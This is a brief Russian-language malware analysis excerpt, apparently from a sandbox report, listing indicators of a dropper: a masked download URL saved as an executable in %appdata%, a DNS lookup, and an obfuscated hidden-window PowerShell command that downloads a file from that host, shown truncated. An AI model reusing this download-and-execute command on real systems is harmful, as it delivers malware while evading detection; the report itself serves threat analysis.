Техническая информация
- http://lt##.#sianetwork.pl/file/hon.vfr как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOwe^rS^he^Ll.EXE ^-^EXec^uT^I^O^NpoLIcy B^y^PAs^s^ -nOPRo^FILe ^-WIn^do^wS^TyLE ^h^idDen^ (NeW^-Ob^Ject^ S^Yst^eM^.^net^.WE^B^CL^IeN^T).do^w^Nl^oAD^F^ilE('http://lt##.#sianetwork....
- DNS ASK lt##.#sianetwork.pl
- '<SYSTEM32>\cmd.exe' /C "pOwe^rS^he^Ll.EXE ^-^EXec^uT^I^O^NpoLIcy B^y^PAs^s^ -nOPRo^FILe ^-WIn^do^wS^TyLE ^h^idDen^ (NeW^-Ob^Ject^ S^Yst^eM^.^net^.WE^B^CL^IeN^T).do^w^Nl^oAD^F^ilE('http://lt##.#sianetwork....' (со скрытым окном)